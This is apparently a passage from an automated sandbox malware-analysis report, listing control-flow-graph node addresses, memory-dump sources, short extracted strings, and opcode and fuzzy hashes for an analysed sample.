                                                  control_flow_graph 1011 7ffaaca8b74f-7ffaaca8b762 1012 7ffaaca8b764-7ffaaca8baa5 1011->1012 1013 7ffaaca8b7ae-7ffaaca8b7c4 1011->1013 1019 7ffaaca8baaf-7ffaaca8baee 1012->1019 1015 7ffaaca8b854-7ffaaca8b884 1013->1015 1016 7ffaaca8b7ca-7ffaaca8b7d2 1013->1016 1025 7ffaaca8b88a-7ffaaca8b88b 1015->1025 1026 7ffaaca8b92e-7ffaaca8b937 1015->1026 1018 7ffaaca8b7d8-7ffaaca8b7ea 1016->1018 1016->1019 1018->1019 1020 7ffaaca8b7f0-7ffaaca8b807 1018->1020 1030 7ffaaca8baf0 1019->1030 1022 7ffaaca8b847-7ffaaca8b84e 1020->1022 1023 7ffaaca8b809-7ffaaca8b810 1020->1023 1022->1015 1022->1016 1023->1019 1027 7ffaaca8b816-7ffaaca8b844 1023->1027 1029 7ffaaca8b88e-7ffaaca8b8a4 1025->1029 1031 7ffaaca8b93d-7ffaaca8b943 1026->1031 1032 7ffaaca8ba6f-7ffaaca8ba95 1026->1032 1027->1022 1029->1019 1033 7ffaaca8b8aa-7ffaaca8b8ce 1029->1033 1038 7ffaaca8bafb-7ffaaca8bb91 1030->1038 1031->1019 1035 7ffaaca8b949-7ffaaca8b958 1031->1035 1036 7ffaaca8b8d0-7ffaaca8b8f3 call 7ffaaca87710 1033->1036 1037 7ffaaca8b921-7ffaaca8b928 1033->1037 1039 7ffaaca8ba62-7ffaaca8ba69 1035->1039 1040 7ffaaca8b95e-7ffaaca8b965 1035->1040 1036->1019 1050 7ffaaca8b8f9-7ffaaca8b91f 1036->1050 1037->1026 1037->1029 1048 7ffaaca8bb16-7ffaaca8bb96 1038->1048 1049 7ffaaca8bb9c-7ffaaca8bbdf 1038->1049 1039->1031 1039->1032 1040->1019 1043 7ffaaca8b96b-7ffaaca8b977 call 7ffaaca87710 1040->1043 1047 7ffaaca8b97c-7ffaaca8b987 1043->1047 1051 7ffaaca8b9c6-7ffaaca8b9d5 1047->1051 1052 7ffaaca8b989-7ffaaca8b9a0 1047->1052 1048->1049 1060 7ffaaca8bb38-7ffaaca8bb98 1048->1060 1068 7ffaaca8bbe1-7ffaaca8bc36 1049->1068 1050->1036 1050->1037 1051->1019 1056 7ffaaca8b9db-7ffaaca8b9ff 1051->1056 1052->1019 1055 7ffaaca8b9a6-7ffaaca8b9c2 1052->1055 1055->1052 1058 7ffaaca8b9c4 1055->1058 1059 7ffaaca8ba02-7ffaaca8ba1f 1056->1059 1062 7ffaaca8ba42-7ffaaca8ba58 1058->1062 1059->1019 1063 7ffaaca8ba25-7ffaaca8ba40 1059->1063 1060->1049 1070 7ffaaca8bb5c-7ffaaca8bb9a 1060->1070 
1062->1019 1067 7ffaaca8ba5a-7ffaaca8ba5e 1062->1067 1063->1059 1063->1062 1067->1039 1077 7ffaaca8bc41-7ffaaca8bce7 1068->1077 1070->1049 1075 7ffaaca8bb7d-7ffaaca8bb90 1070->1075 1089 7ffaaca8be17-7ffaaca8be34 1077->1089 1090 7ffaaca8bced-7ffaaca8c090 1077->1090 1091 7ffaaca8be3a-7ffaaca8be3f 1089->1091 1092 7ffaaca8c141-7ffaaca8c159 1089->1092 1094 7ffaaca8be42-7ffaaca8be49 1091->1094 1098 7ffaaca8c15b-7ffaaca8c318 1092->1098 1099 7ffaaca8c10d-7ffaaca8c118 1092->1099 1096 7ffaaca8be4b-7ffaaca8be4f 1094->1096 1097 7ffaaca8bdcc-7ffaaca8c139 1094->1097 1096->1068 1101 7ffaaca8be55 1096->1101 1097->1092 1103 7ffaaca8bed3-7ffaaca8bed6 1101->1103 1105 7ffaaca8bed9-7ffaaca8bee0 1103->1105 1107 7ffaaca8bee6 1105->1107 1108 7ffaaca8be57-7ffaaca8be8c call 7ffaaca8bae0 1105->1108 1110 7ffaaca8bf56-7ffaaca8bf5d 1107->1110 1108->1092 1115 7ffaaca8be92-7ffaaca8bea2 1108->1115 1112 7ffaaca8bee8-7ffaaca8bf1a call 7ffaaca8bae0 1110->1112 1113 7ffaaca8bf5f-7ffaaca8bfa5 1110->1113 1112->1092 1120 7ffaaca8bf20-7ffaaca8bf48 1112->1120 1127 7ffaaca8bd74-7ffaaca8bd78 1113->1127 1128 7ffaaca8bfab-7ffaaca8bfb0 1113->1128 1115->1068 1118 7ffaaca8bea8-7ffaaca8bec5 1115->1118 1118->1092 1121 7ffaaca8becb-7ffaaca8bed0 1118->1121 1120->1092 1122 7ffaaca8bf4e-7ffaaca8bf53 1120->1122 1121->1103 1122->1110 1129 7ffaaca8bdca 1127->1129 1130 7ffaaca8bd7a-7ffaaca8c10c 1127->1130 1131 7ffaaca8c036-7ffaaca8c03a 1128->1131 1129->1094 1130->1099 1133 7ffaaca8bfb5-7ffaaca8bfe4 call 7ffaaca8bae0 1131->1133 1134 7ffaaca8c040-7ffaaca8c046 1131->1134 1133->1092 1137 7ffaaca8bfea-7ffaaca8bffa 1133->1137 1137->1077 1138 7ffaaca8c000-7ffaaca8c00f 1137->1138 1138->1092 1139 7ffaaca8c015-7ffaaca8c028 1138->1139 1139->1105 1140 7ffaaca8c02e-7ffaaca8c033 1139->1140 1140->1131
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$r6$r6$r6
                                                  • API String ID: 0-596633268
                                                  • Opcode ID: fc3793607657befdb6663809763fae76390ccf8f35d3306a7b9c39db4cf172a4
                                                  • Instruction ID: d9f70cd302e3f2b00be9ce13afdb1f2fef14b66109a8b519251389ecf07a2117
                                                  • Opcode Fuzzy Hash: fc3793607657befdb6663809763fae76390ccf8f35d3306a7b9c39db4cf172a4
                                                  • Instruction Fuzzy Hash: AF52D271929649CFEB5CCF18E4956B977A2FF4A300F5081BDD44EC7286EA38E945CB80

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1577 7ffaac6c6ca9-7ffaac6c6cba 1578 7ffaac6c6c68-7ffaac6c6c98 1577->1578 1579 7ffaac6c6cbc-7ffaac6c6ce4 1577->1579 1584 7ffaac6c6c9f-7ffaac6c6ca4 1578->1584 1582 7ffaac6c6cea-7ffaac6c6cef 1579->1582 1583 7ffaac6c7001-7ffaac6c700b 1579->1583 1585 7ffaac6c6cfb-7ffaac6c6d14 1582->1585 1586 7ffaac6c6cf1-7ffaac6c6cf4 1582->1586 1590 7ffaac6c700c-7ffaac6c703a 1583->1590 1588 7ffaac6c6d28-7ffaac6c6d55 1585->1588 1589 7ffaac6c6d16-7ffaac6c6d26 1585->1589 1586->1585 1588->1590 1594 7ffaac6c6d5b-7ffaac6c6d66 1588->1594 1589->1588 1595 7ffaac6c6fe8 1590->1595 1596 7ffaac6c703c-7ffaac6c707e 1590->1596 1597 7ffaac6c6e24-7ffaac6c6e29 1594->1597 1598 7ffaac6c6d6c-7ffaac6c6d7a 1594->1598 1603 7ffaac6c6fef-7ffaac6c7000 1595->1603 1625 7ffaac6c709b-7ffaac6c70ac 1596->1625 1626 7ffaac6c7080-7ffaac6c7086 1596->1626 1601 7ffaac6c6ebd-7ffaac6c6ec7 1597->1601 1602 7ffaac6c6e2f-7ffaac6c6e39 1597->1602 1598->1590 1599 7ffaac6c6d80-7ffaac6c6d91 1598->1599 1604 7ffaac6c6d93-7ffaac6c6db6 1599->1604 1605 7ffaac6c6df9-7ffaac6c6e10 1599->1605 1607 7ffaac6c6ee9-7ffaac6c6ef0 1601->1607 1608 7ffaac6c6ec9-7ffaac6c6ed4 1601->1608 1602->1590 1606 7ffaac6c6e3f-7ffaac6c6e53 1602->1606 1609 7ffaac6c6e58-7ffaac6c6e5d 1604->1609 1610 7ffaac6c6dbc-7ffaac6c6dcf 1604->1610 1605->1590 1612 7ffaac6c6e16-7ffaac6c6e1e 1605->1612 1611 7ffaac6c6ef3-7ffaac6c6efd 1606->1611 1607->1611 1620 7ffaac6c6edb-7ffaac6c6ee7 1608->1620 1617 7ffaac6c6dd3-7ffaac6c6df7 1609->1617 1610->1617 1611->1590 1615 7ffaac6c6f03-7ffaac6c6f1b 1611->1615 1612->1597 1612->1598 1615->1590 1619 7ffaac6c6f21-7ffaac6c6f39 1615->1619 1617->1605 1624 7ffaac6c6e62-7ffaac6c6e65 1617->1624 1619->1590 1621 7ffaac6c6f3f-7ffaac6c6f73 1619->1621 1620->1607 1621->1590 1653 7ffaac6c6f79-7ffaac6c6f8c 1621->1653 1630 7ffaac6c6e67-7ffaac6c6e77 1624->1630 1631 7ffaac6c6e7b-7ffaac6c6e88 1624->1631 1627 7ffaac6c70bd-7ffaac6c70df 1625->1627 1628 7ffaac6c70ae-7ffaac6c70b9 1625->1628 1632 
7ffaac6c7088-7ffaac6c7099 1626->1632 1633 7ffaac6c70e1-7ffaac6c711d 1626->1633 1645 7ffaac6c70e0 1627->1645 1628->1627 1630->1631 1631->1590 1635 7ffaac6c6e8e-7ffaac6c6ebc 1631->1635 1632->1625 1632->1626 1649 7ffaac6c711f-7ffaac6c7132 1633->1649 1650 7ffaac6c711e 1633->1650 1649->1645 1659 7ffaac6c7134-7ffaac6c7137 1649->1659 1650->1649 1653->1603 1656 7ffaac6c6f8e-7ffaac6c6f99 1653->1656 1656->1603 1660 7ffaac6c6f9b-7ffaac6c6fb2 1656->1660 1662 7ffaac6c7138-7ffaac6c7149 1659->1662 1664 7ffaac6c6fb4-7ffaac6c6fc2 1660->1664 1665 7ffaac6c6fc3-7ffaac6c6fe5 1660->1665 1662->1650 1670 7ffaac6c714b-7ffaac6c7156 1662->1670 1664->1665 1665->1595 1673 7ffaac6c7158-7ffaac6c7189 1670->1673 1673->1662 1677 7ffaac6c718c-7ffaac6c718f 1673->1677 1679 7ffaac6c7190-7ffaac6c71a3 1677->1679 1682 7ffaac6c71a5-7ffaac6c71a8 1679->1682 1683 7ffaac6c71e2 1682->1683 1684 7ffaac6c71aa 1682->1684 1683->1679 1685 7ffaac6c71e4-7ffaac6c7202 1683->1685 1684->1673 1686 7ffaac6c71ac-7ffaac6c71af 1684->1686 1689 7ffaac6c71b0-7ffaac6c71bf 1685->1689 1692 7ffaac6c7204-7ffaac6c7211 1685->1692 1686->1689 1695 7ffaac6c71c0-7ffaac6c71d1 1689->1695 1692->1695 1696 7ffaac6c7214 1692->1696 1695->1682 1697 7ffaac6c7215-7ffaac6c7241 1696->1697 1705 7ffaac6c7243-7ffaac6c7258 1697->1705
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$d
                                                  • API String ID: 0-2243634771
                                                  • Opcode ID: 66128f1d735d91a327555b1d197d2a11ce0466a02e11ddeae94858505233825d
                                                  • Instruction ID: c6e3b4708207948796446998851dd3c6ce9ee58b567b83267b12fa265eb91504
                                                  • Opcode Fuzzy Hash: 66128f1d735d91a327555b1d197d2a11ce0466a02e11ddeae94858505233825d
                                                  • Instruction Fuzzy Hash: 88220271A0D786CFF74BDB28C4915B57BE0EF56310B1891BAD44ECB293D928E80A87C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: p]
                                                  • API String ID: 0-315238154
                                                  • Opcode ID: e3fc5cdfd240aaa60e8d10a52734baf46c60ecaf0181d94fba188868304418a7
                                                  • Instruction ID: f3ab15d3ee6a644c0854d0a29709dbd501df0b60f921de5d16dcc752c45b9477
                                                  • Opcode Fuzzy Hash: e3fc5cdfd240aaa60e8d10a52734baf46c60ecaf0181d94fba188868304418a7
                                                  • Instruction Fuzzy Hash: 42D1383090DD89CFF76AEB1884557B437D1FF9A320B14A2BAD44EC7592DD28E80A87C1
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 734d16cd1f275cfb72008e4759137f2726979ccd93cff31665cee067037593c4
                                                  • Instruction ID: 312da8531bd5b7b1d67d9862b27c6cf164095a67d1461188ab3d028fcd2221fd
                                                  • Opcode Fuzzy Hash: 734d16cd1f275cfb72008e4759137f2726979ccd93cff31665cee067037593c4
                                                  • Instruction Fuzzy Hash: 24A10B72D0D686CFF747EB78D4A64E93BA0FF02318B049176D05ECA293ED29A50687D1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1253 7ffaac6ccdb2-7ffaac6ccdb9 1254 7ffaac6ccfd5-7ffaac6ccfe6 1253->1254 1255 7ffaac6ccdbf-7ffaac6ccdf1 call 7ffaac6ccb50 call 7ffaac6cca20 1253->1255 1259 7ffaac6ccfe8 1254->1259 1260 7ffaac6ccfed-7ffaac6ccff8 1254->1260 1255->1254 1263 7ffaac6ccdf7-7ffaac6cce49 call 7ffaac6ccb50 call 7ffaac6cca20 1255->1263 1259->1260 1263->1254 1271 7ffaac6cce4f-7ffaac6cce94 call 7ffaac6ccb50 1263->1271 1277 7ffaac6cce96-7ffaac6cceaa call 7ffaac6cca20 1271->1277 1278 7ffaac6ccf04-7ffaac6ccf40 call 7ffaac6c9580 1271->1278 1277->1254 1284 7ffaac6cceb0-7ffaac6cced3 call 7ffaac6ccb50 1277->1284 1288 7ffaac6ccf79-7ffaac6ccf80 call 7ffaac6c93b0 1278->1288 1289 7ffaac6cced9-7ffaac6ccee9 1284->1289 1290 7ffaac6cd0a5-7ffaac6cd0bc 1284->1290 1293 7ffaac6ccf85-7ffaac6ccf8a 1288->1293 1289->1290 1292 7ffaac6cceef-7ffaac6ccf02 1289->1292 1297 7ffaac6cd0be 1290->1297 1298 7ffaac6cd0bf-7ffaac6cd0cd 1290->1298 1292->1277 1292->1278 1295 7ffaac6ccf42-7ffaac6ccf62 1293->1295 1296 7ffaac6ccf8c-7ffaac6ccf8e 1293->1296 1295->1290 1299 7ffaac6ccf68-7ffaac6ccf73 1295->1299 1296->1254 1300 7ffaac6ccf90-7ffaac6ccf93 1296->1300 1297->1298 1301 7ffaac6cd0d5 1298->1301 1302 7ffaac6cd0cf 1298->1302 1299->1288 1303 7ffaac6cd05b-7ffaac6cd06f 1299->1303 1304 7ffaac6ccf99-7ffaac6ccfb4 1300->1304 1305 7ffaac6ccf95 1300->1305 1306 7ffaac6cd0d7 1301->1306 1307 7ffaac6cd0d9-7ffaac6cd0ea 1301->1307 1302->1301 1314 7ffaac6cd076-7ffaac6cd081 1303->1314 1315 7ffaac6cd071 1303->1315 1304->1290 1312 7ffaac6ccfba-7ffaac6ccfd3 call 7ffaac6cca20 1304->1312 1305->1304 1306->1307 1309 7ffaac6cd119 1306->1309 1310 7ffaac6cd098-7ffaac6cd09c 1307->1310 1311 7ffaac6cd0ec-7ffaac6cd118 1307->1311 1317 7ffaac6cd11a-7ffaac6cd35a 1309->1317 1310->1290 1311->1309 1311->1317 1312->1254 1319 7ffaac6ccff9-7ffaac6cd012 call 7ffaac6ccb50 1312->1319 1315->1314 1319->1290 1324 7ffaac6cd018-7ffaac6cd01f 1319->1324 1325 7ffaac6cd049-7ffaac6cd051 1324->1325 1326 
7ffaac6cd053-7ffaac6cd059 1325->1326 1327 7ffaac6cd021-7ffaac6cd03d 1325->1327 1326->1303 1329 7ffaac6cd082 1326->1329 1327->1290 1328 7ffaac6cd03f-7ffaac6cd047 1327->1328 1328->1325 1329->1310
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6$r6
                                                  • API String ID: 0-701349563
                                                  • Opcode ID: 7f1a929f5713f6d86b52c5182e4474c543a16179fa6b83868054409dfc212678
                                                  • Instruction ID: db42e25d008718d752f31e74bc88699c0bef7ef197675d54de49f327bf1d6bb0
                                                  • Opcode Fuzzy Hash: 7f1a929f5713f6d86b52c5182e4474c543a16179fa6b83868054409dfc212678
                                                  • Instruction Fuzzy Hash: 63C1A37061DA469FF74BDF28C0946A4B7A1FF56300F54A179C04EC7A86CB28F85687C1

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6$r6
                                                  • API String ID: 0-701349563
                                                  • Opcode ID: d304407f3670e6f18bedcbe453ebe32088229cfec926633afd9845a7f14c55ac
                                                  • Instruction ID: 6b761fd7924db3b6bb1c8498e61e994e1e70efee791f35e737bd5d35eb69410e
                                                  • Opcode Fuzzy Hash: d304407f3670e6f18bedcbe453ebe32088229cfec926633afd9845a7f14c55ac
                                                  • Instruction Fuzzy Hash: 82C1F371929A46CFF749DB18E4906B4B7A2FF4A300F548179C04EC7A86EB28F955CBC0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: b4$r6$r6
                                                  • API String ID: 0-3183416175
                                                  • Opcode ID: fc37167a43e3ac630d1124180afe4eb53a8943d01c31dc2ece3e43a9b78d972c
                                                  • Instruction ID: 9fb97efd18279e5e1e36462437a8082ca2ddd9f5f9d8cb26b9803b2788dfadf4
                                                  • Opcode Fuzzy Hash: fc37167a43e3ac630d1124180afe4eb53a8943d01c31dc2ece3e43a9b78d972c
                                                  • Instruction Fuzzy Hash: 78510771D2C55ACFF7A89718A865AF877A2FF56300F50C1B9D04FC7186ED28AE488781

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0#$p]
                                                  • API String ID: 0-2450293431
                                                  • Opcode ID: e6955d0bbf159bdebfc4d2f49ececf6e93079707332cd4f4929a1eaa591ec6da
                                                  • Instruction ID: a0163c83d646ae48d54ac3976332b0f938ace0c9eadcbad10ce51dbf33c3a163
                                                  • Opcode Fuzzy Hash: e6955d0bbf159bdebfc4d2f49ececf6e93079707332cd4f4929a1eaa591ec6da
                                                  • Instruction Fuzzy Hash: DC329430A19A1DCFEB98DB18D895A7877E2FF55310B5481B9D10EC7292EE24ED45CBC0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0#$p]
                                                  • API String ID: 0-2450293431
                                                  • Opcode ID: f1116c3662afc386ae9aca78c2d70b230512976cf88d48b74b20954db83bc7da
                                                  • Instruction ID: 933fbc264203eddde604d8220350c6624f84d598e0dc53cc535fbe72d199c271
                                                  • Opcode Fuzzy Hash: f1116c3662afc386ae9aca78c2d70b230512976cf88d48b74b20954db83bc7da
                                                  • Instruction Fuzzy Hash: 21328330A1DA19CFEB9ADB18C895AB973E1FF59310F5091B9D40EC7292DE24EC45CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0#$p]
                                                  • API String ID: 0-2450293431
                                                  • Opcode ID: d7bee374e545a01f566e657ff8be07fe5f8d56b1b0eb5435af15fe706680fec4
                                                  • Instruction ID: 26101772da253c8b3ad96890fc0fc834a244a5b0f827b5b242e1d55896e5818f
                                                  • Opcode Fuzzy Hash: d7bee374e545a01f566e657ff8be07fe5f8d56b1b0eb5435af15fe706680fec4
                                                  • Instruction Fuzzy Hash: 6232B530A1DA19CFEB9ADB19C895A7873E1FF95311F54A1B9D00EC7292DE24EC45CB80
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 629f7ade9247c5785688e136eb7e519ec8089e2309bfbc22f75362f11f510e54
                                                  • Instruction ID: 7d02ae50cb5272b7dc4edd4fce80d6c3a5f80b6ee2ffe10f27fead68c492b70d
                                                  • Opcode Fuzzy Hash: 629f7ade9247c5785688e136eb7e519ec8089e2309bfbc22f75362f11f510e54
                                                  • Instruction Fuzzy Hash: FBB1F470A2AA46DFE749DB1CD0906B4B7A2FF5A310F548179C04EC7A86EB28F955C7C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 1587dbf26dc01b5aa170dedf9e95e2a6f49031f79ee248a5a2401076aea4fba9
                                                  • Instruction ID: 4ac33685a077886a2db81963e9df5a65409844a465cfa3d96da1a4bea88bddbd
                                                  • Opcode Fuzzy Hash: 1587dbf26dc01b5aa170dedf9e95e2a6f49031f79ee248a5a2401076aea4fba9
                                                  • Instruction Fuzzy Hash: 1FB1A170A1DA468FE74BDB29C0906B4BBA1FF56300F54A1B9C04EC7A86DF28F85587D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 2b77f9f848ab7f0d2e3b69c5003c9139497f2a5d587e31fe0dd012aa39b63be3
                                                  • Instruction ID: f76cfc8ea3baea22c87618777d393702dd43ec571e8d0c4dfbc5328283df4377
                                                  • Opcode Fuzzy Hash: 2b77f9f848ab7f0d2e3b69c5003c9139497f2a5d587e31fe0dd012aa39b63be3
                                                  • Instruction Fuzzy Hash: 8A514A70D0D64ACFEB5ACB98C4955BDBBB1EF45300F1091BAD01EA7296CE34A905CB94
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 6396e7160125f39055aee0297d5835bd783a566b372722c25fb88394c7add0f9
                                                  • Instruction ID: 8a0ee4f0f6e6df8f0d4ec4c1f8b4b0c37a1ac3505111cecfa175da7bd05e8912
                                                  • Opcode Fuzzy Hash: 6396e7160125f39055aee0297d5835bd783a566b372722c25fb88394c7add0f9
                                                  • Instruction Fuzzy Hash: 34517271D1964ACFEB49DB98E8555FDB7B2FF45300F1080BAD01EE7286DA34AA05CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 001471cce2b188a3e222c587c3da23fa67d4495ed2d29fcdbe082e3081273572
                                                  • Instruction ID: d27cfbea00da8853138acf3efc39ba5a298902b76b9a5c7fac9434a4c9ec6c40
                                                  • Opcode Fuzzy Hash: 001471cce2b188a3e222c587c3da23fa67d4495ed2d29fcdbe082e3081273572
                                                  • Instruction Fuzzy Hash: 7E516171D0D64ADFEB4ACBA8C4555BDBBB1FF45300F10907AC01EEB292CA38A905CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $r6
                                                  • API String ID: 0-2810495310
                                                  • Opcode ID: 2cebcc1cf3dbde7d047cc32803927d8e8885b628bce9d6ddb00dc7e3ca5eff72
                                                  • Instruction ID: 722727026259b20adf154e3cba10da3cc3062e2327c3c6113abd69c753a354bd
                                                  • Opcode Fuzzy Hash: 2cebcc1cf3dbde7d047cc32803927d8e8885b628bce9d6ddb00dc7e3ca5eff72
                                                  • Instruction Fuzzy Hash: 4A517171D1A64ECFEB59CB9CD4655BDB7B1EF45300F1080BAC01EE7282DA389A05CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2519212074.00007FFAAC6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC6C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaac6c0000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: 7be8d2e5865a86936f6e25021bf463c14f5e7118e768dca21b69d515c8361224
                                                  • Instruction ID: a8d3df81794c4e7734232f1d2ab9fb410d0b494339dd1a72f62cb71476c7c312
                                                  • Opcode Fuzzy Hash: 7be8d2e5865a86936f6e25021bf463c14f5e7118e768dca21b69d515c8361224
                                                  • Instruction Fuzzy Hash: 0E314831E09A4A9FE749DB5C84919B9F7A2FF56350B54913AD01ED3682CF24FC168BC0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2524664462.00007FFAACA80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACA80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ffaaca80000_DZNTXHJCUWXUTqOrRrGotfqdMP.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: r6$r6
                                                  • API String ID: 0-2018302956
                                                  • Opcode ID: e55114d714575057e408849addae090ffaffc7b06ec11480e6b8755fb340cc23
